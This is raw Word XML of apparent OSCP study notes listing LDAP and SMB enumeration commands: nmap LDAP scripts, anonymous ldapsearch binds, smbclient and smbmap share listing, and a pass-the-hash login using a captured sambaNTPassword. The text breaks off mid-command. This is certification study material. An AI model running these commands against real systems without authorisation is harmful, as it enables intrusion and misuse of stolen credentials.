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0843F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2B21B5C0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6D28E9BF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662E501E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200F7F88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3F20F35E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221D97B8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3DF1D72B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6561143A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5997B9FC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6502F4CC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757F8CBF" w14:textId="77777777" w:rsidR="00BC0097" w:rsidRDefault="00BC0097" w:rsidP="00BC0097">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E5E54C7" w14:textId="3D761139" w:rsidR="00BC0097" w:rsidRDefault="00BC0097" w:rsidP="00BC0097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OSCP NOTES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F78D999" w14:textId="39886A15" w:rsidR="00BC0097" w:rsidRDefault="00BC0097" w:rsidP="00BC009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Cooper Timewell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FBCAEB" w14:textId="07A498D4" w:rsidR="00B52CE0" w:rsidRDefault="00B52CE0" w:rsidP="00B52CE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5087AF5E" w14:textId="005F8564" w:rsidR="00B52CE0" w:rsidRDefault="00B52CE0" w:rsidP="00B52CE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B8CF171" w14:textId="19176B06" w:rsidR="00B52CE0" w:rsidRDefault="00B52CE0" w:rsidP="00B52CE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3271877E" w14:textId="4867BD19" w:rsidR="00B52CE0" w:rsidRDefault="00B52CE0" w:rsidP="00B52CE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ECE3721" w14:textId="5825DF07" w:rsidR="00B52CE0" w:rsidRDefault="00B52CE0" w:rsidP="00B52CE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FE9FAEA" w14:textId="0E4BC804" w:rsidR="00B52CE0" w:rsidRDefault="00B52CE0" w:rsidP="00B52CE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C44EF3D" w14:textId="4B9AA9F6" w:rsidR="00B52CE0" w:rsidRDefault="00B52CE0" w:rsidP="00B52CE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0777220E" w14:textId="006224D8" w:rsidR="00B52CE0" w:rsidRDefault="00B52CE0" w:rsidP="00B52CE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="502C16F5" w14:textId="4679A074" w:rsidR="00B52CE0" w:rsidRDefault="00B52CE0" w:rsidP="00B52CE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="430D5623" w14:textId="71AE47F1" w:rsidR="00B52CE0" w:rsidRDefault="00B52CE0" w:rsidP="00B52CE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="460AD07A" w14:textId="27ECAFC3" w:rsidR="00B52CE0" w:rsidRDefault="00B52CE0" w:rsidP="00B52CE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E1FA4B5" w14:textId="5EFE7790" w:rsidR="00B52CE0" w:rsidRDefault="00B52CE0" w:rsidP="00B52CE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="633DB7E9" w14:textId="51C5555D" w:rsidR="00B52CE0" w:rsidRDefault="00B52CE0" w:rsidP="00B52CE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A68A3F5" w14:textId="3B66B94F" w:rsidR="00B52CE0" w:rsidRDefault="00B52CE0" w:rsidP="00B52CE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EDFD43A" w14:textId="1BDDAEAE" w:rsidR="00B52CE0" w:rsidRDefault="00B52CE0" w:rsidP="00B52CE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22831B8F" w14:textId="1AC50854" w:rsidR="00B52CE0" w:rsidRDefault="00B52CE0" w:rsidP="00B52CE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13DD4E04" w14:textId="2C06BE94" w:rsidR="00B52CE0" w:rsidRDefault="00B52CE0" w:rsidP="00B52CE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19CA066A" w14:textId="484B8D9A" w:rsidR="00B52CE0" w:rsidRPr="00F441A3" w:rsidRDefault="00B52CE0" w:rsidP="00F441A3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00F441A3">
        <w:lastRenderedPageBreak/>
        <w:t>LDAP</w:t>
      </w:r>
      <w:r w:rsidR="0093546D" w:rsidRPr="00F441A3">
        <w:t xml:space="preserve"> (389)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E81D11" w14:textId="14FA4DB2" w:rsidR="00EF24A4" w:rsidRPr="00F441A3" w:rsidRDefault="00EF24A4" w:rsidP="00F441A3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F441A3">
        <w:t>ldapsearch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A09CFF" w14:textId="6E1BF3A7" w:rsidR="0093546D" w:rsidRPr="00F441A3" w:rsidRDefault="008C0C7D" w:rsidP="00F441A3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_DC_–_Domain"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00F441A3">
        <w:t>DC – Domain Component</w:t>
      </w:r>
      <w:r w:rsidR="00570FD0">
        <w:t xml:space="preserve"> (Naming Contexts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6330F81D" w14:textId="66536BED" w:rsidR="008C0C7D" w:rsidRPr="008C0C7D" w:rsidRDefault="008C0C7D" w:rsidP="00B52CE0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Light Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D164653" w14:textId="32075F28" w:rsidR="001F2B7B" w:rsidRPr="00FB502E" w:rsidRDefault="00EE0E57" w:rsidP="00FB50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 xml:space="preserve">nmap -p 389 --script ldap-rootdse -Pn </w:t>
      </w:r>
      <w:r w:rsidR="00E65277">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;&lt;ip&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174CAD59" w14:textId="50867CEB" w:rsidR="001B7E7E" w:rsidRDefault="00FB502E" w:rsidP="00FB502E">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Full Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52732381" w14:textId="4CE6D6BD" w:rsidR="00FB502E" w:rsidRPr="004B4C8A" w:rsidRDefault="00C5071C" w:rsidP="004B4C8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 xml:space="preserve">nmap -p 389 --script ldap-search -Pn </w:t>
      </w:r>
      <w:r w:rsidR="00E65277">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;&lt;ip&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61836AE5" w14:textId="548ED5E9" w:rsidR="0043348C" w:rsidRPr="00FF567F" w:rsidRDefault="00571F31" w:rsidP="00B52CE0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F4ECF">
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
        <w:t>Anonymous Bind</w:t>
      </w:r>
      <w:r w:rsidR="005F35A7">
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Get </w:t>
      </w:r>
      <w:r w:rsidR="00593BBF">
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
        <w:t>Information</w:t>
      </w:r>
      <w:r w:rsidR="00FF567F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (requires</w:t>
      </w:r>
      <w:r w:rsidR="0093546D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00FF567F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="_DC_–_Domain" w:history="1">
        <w:r w:rsidR="002E69F0" w:rsidRPr="00F96448">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
            <w:iCs/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>DC</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00FF567F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9AA239" w14:textId="37B640E8" w:rsidR="00571F31" w:rsidRDefault="007E0C53" w:rsidP="00056C49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 w:rsidRPr="00056C49">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ldapsearch -x -h </w:t>
      </w:r>
      <w:r w:rsidR="007A3F83">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;&lt;ip&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00DA6E57">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s base -b ‘dc=&lt;&lt;DC-1&gt;&gt;,dc=&lt;&lt;DC-2&gt;&gt;’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C84D4B" w14:textId="4068AAE7" w:rsidR="00DA6E57" w:rsidRDefault="00DA6E57" w:rsidP="00056C49">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ldapsearch -x -h </w:t>
      </w:r>
      <w:r w:rsidR="00345930">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;&lt;ip&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s sub -b ‘dc=&lt;&lt;DC-1&gt;&gt;,dc=&lt;&lt;DC-2&gt;&gt;’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8E494F" w14:textId="7094EC2E" w:rsidR="00B820B7" w:rsidRPr="00B820B7" w:rsidRDefault="0054682B" w:rsidP="00B820B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92510C" wp14:editId="02484AC2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>36940</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5716988" cy="310101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988" cy="31010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74CB1" w14:textId="7E1E7103" w:rsidR="00E06F31" w:rsidRPr="00747FFA" w:rsidRDefault="00410C3D" w:rsidP="00E06F3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47FFA">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Got</w:t>
                            </w:r>
                            <w:r w:rsidR="00E06F31" w:rsidRPr="00747FFA">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> a </w:t>
                            </w:r>
                            <w:r w:rsidR="00E06F31" w:rsidRPr="00747FFA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sambaNTPassword</w:t>
                            </w:r>
                            <w:r w:rsidR="00E06F31" w:rsidRPr="00747FFA">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t xml:space="preserve">? Head over to </w:t>
                            </w:r>
                            <w:hyperlink w:anchor="_Login_Using_SambaNTPassword" w:history="1">
                              <w:r w:rsidR="00E06F31" w:rsidRPr="00C93211">
                                <w:rPr>
                                  <w:rStyle w:val="Hyperlink"/>
                                  <w:i/>
                                  <w:iCs/>
                                  <w:lang w:val="en-US"/>
                                </w:rPr>
                                <w:t>smbmap</w:t>
                              </w:r>
                            </w:hyperlink>
                            <w:r w:rsidR="00E06F31" w:rsidRPr="00747FFA">
                              <w:rPr>
                                <w:i/>
                                <w:i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E06F31" w:rsidRPr="00747FFA">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>to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2510C" id="Rectangle 1" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:398.95pt;margin-top:2.9pt;width:450.15pt;height:24.4pt;z-index:-25165721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" fillcolor="#f7caac [1301]" stroked="f" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6D974CB1" w14:textId="7E1E7103" w:rsidR="00E06F31" w:rsidRPr="00747FFA" w:rsidRDefault="00410C3D" w:rsidP="00E06F3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47FFA">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Got</w:t>
                      </w:r>
                      <w:r w:rsidR="00E06F31" w:rsidRPr="00747FFA">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> a </w:t>
                      </w:r>
                      <w:r w:rsidR="00E06F31" w:rsidRPr="00747FFA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sambaNTPassword</w:t>
                      </w:r>
                      <w:r w:rsidR="00E06F31" w:rsidRPr="00747FFA">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve">? Head over to </w:t>
                      </w:r>
                      <w:hyperlink w:anchor="_Login_Using_SambaNTPassword" w:history="1">
                        <w:r w:rsidR="00E06F31" w:rsidRPr="00C93211">
                          <w:rPr>
                            <w:rStyle w:val="Hyperlink"/>
                            <w:i/>
                            <w:iCs/>
                            <w:lang w:val="en-US"/>
                          </w:rPr>
                          <w:t>smbmap</w:t>
                        </w:r>
                      </w:hyperlink>
                      <w:r w:rsidR="00E06F31" w:rsidRPr="00747FFA">
                        <w:rPr>
                          <w:i/>
                          <w:i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E06F31" w:rsidRPr="00747FFA">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>to login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67AD22" w14:textId="509637D1" w:rsidR="00880926" w:rsidRDefault="00880926" w:rsidP="00322F3C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE83321" w14:textId="3FFE4989" w:rsidR="0054682B" w:rsidRDefault="0054682B" w:rsidP="00322F3C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1957F0BA" w14:textId="63866DCC" w:rsidR="0054682B" w:rsidRDefault="00834EF4" w:rsidP="00834EF4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372556EE" w14:textId="4A2F485F" w:rsidR="00992427" w:rsidRDefault="00992427" w:rsidP="00834EF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F844A6" w14:textId="574694BD" w:rsidR="00992427" w:rsidRDefault="00992427" w:rsidP="00992427">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>List Shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C4F931" w14:textId="7E8DFCF7" w:rsidR="00992427" w:rsidRPr="00992427" w:rsidRDefault="00992427" w:rsidP="009924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>smbclient -L //&lt;&lt;ip&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282E9661" w14:textId="1E980A97" w:rsidR="00992427" w:rsidRPr="00992427" w:rsidRDefault="00992427" w:rsidP="00992427">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00992427">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e.g.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DB16C6" w14:textId="60867895" w:rsidR="00992427" w:rsidRPr="00FD5133" w:rsidRDefault="00992427" w:rsidP="00992427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i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>smbclient -L //10.10.10.100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CCC3A6" w14:textId="77F595C4" w:rsidR="00FD5133" w:rsidRDefault="00FD5133" w:rsidP="00FD5133">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Login to Share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237F7219" w14:textId="0C390226" w:rsidR="00FD5133" w:rsidRPr="00FD5133" w:rsidRDefault="00FD5133" w:rsidP="00FD51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>smbclient //&lt;&lt;ip&gt;&gt;/&lt;&lt;share&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C199F19" w14:textId="26BD6BAE" w:rsidR="00FD5133" w:rsidRDefault="00FD5133" w:rsidP="00FD513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e.g.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD8AF34" w14:textId="30B9512E" w:rsidR="00FD5133" w:rsidRPr="00FD5133" w:rsidRDefault="00FD5133" w:rsidP="00FD5133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i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>smbclient //10.10.10.100/Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372F25B1" w14:textId="17DA9225" w:rsidR="00834EF4" w:rsidRDefault="00834EF4" w:rsidP="00834EF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>smbmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB8D6DE" w14:textId="2E15A840" w:rsidR="00653CA0" w:rsidRDefault="00653CA0" w:rsidP="00834EF4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Login_Using_SambaNTPassword"/>
      <w:bookmarkStart w:id="2" w:name="_Got_a_SambaNTPassword?"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>List Shares with Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE47CD7" w14:textId="6666E880" w:rsidR="00653CA0" w:rsidRDefault="00653CA0" w:rsidP="00653CA0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653CA0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">smbmap -H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;&lt;ip&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F27415" w14:textId="5E863147" w:rsidR="00A90762" w:rsidRDefault="00A90762" w:rsidP="00A90762">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">List All Contents (Recursively) </w:t>
      </w:r>
      <w:r w:rsidR="00F622D4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f Share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC3E86E" w14:textId="5D44FC82" w:rsidR="00A90762" w:rsidRDefault="00530835" w:rsidP="00530835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530835">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">smbmap -R </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;&lt;share-name&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00530835">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;&lt;ip&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00530835">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> --depth </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;&lt;depth&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A980256" w14:textId="1C5C6204" w:rsidR="00530835" w:rsidRPr="00530835" w:rsidRDefault="00530835" w:rsidP="00530835">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e.g.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F28E548" w14:textId="183541A3" w:rsidR="00530835" w:rsidRDefault="00530835" w:rsidP="00530835">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00530835">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>smbmap -R Replication -H 10.10.10.100 --depth 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E23BD3E" w14:textId="77777777" w:rsidR="00FC598F" w:rsidRPr="00330968" w:rsidRDefault="00FC598F" w:rsidP="00FC598F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AD92EE7" w14:textId="7A85025E" w:rsidR="00834EF4" w:rsidRDefault="00971939" w:rsidP="00834EF4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Got a </w:t>
      </w:r>
      <w:r w:rsidR="00834EF4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SambaNTPassword</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201E23A6" w14:textId="3747DBFD" w:rsidR="00283F0D" w:rsidRDefault="00855AF3" w:rsidP="00971939">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACF4A6E" w14:textId="2CF163A5" w:rsidR="00855AF3" w:rsidRPr="00B42357" w:rsidRDefault="00465E5F" w:rsidP="00DA32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>smbmap -u &lt;&lt;username&gt;&gt; -p ‘&lt;&lt;sambaNTP&gt;&gt;:&lt;&lt;sambaNTP&gt;&gt;’</w:t>
      </w:r>
      <w:r w:rsidR="00B42357">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -H </w:t>
      </w:r>
      <w:r w:rsidR="009D2524">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;&lt;ip&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70970308" w14:textId="6077081B" w:rsidR="00B42357" w:rsidRDefault="00B42357" w:rsidP="00B42357">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>List Contents of Newly Found Share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517ED49D" w14:textId="79F8C504" w:rsidR="00B42357" w:rsidRPr="00E4236E" w:rsidRDefault="00B42357" w:rsidP="00B423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 xml:space="preserve">smbmap -u &lt;&lt;username&gt;&gt; -p ‘&lt;&lt;sambaNTP&gt;&gt;:&lt;&lt;sambaNTP&gt;&gt;’ -H </w:t>
      </w:r>
      <w:r w:rsidR="00B43CE5">
        <w:rPr>
          <w:i/>
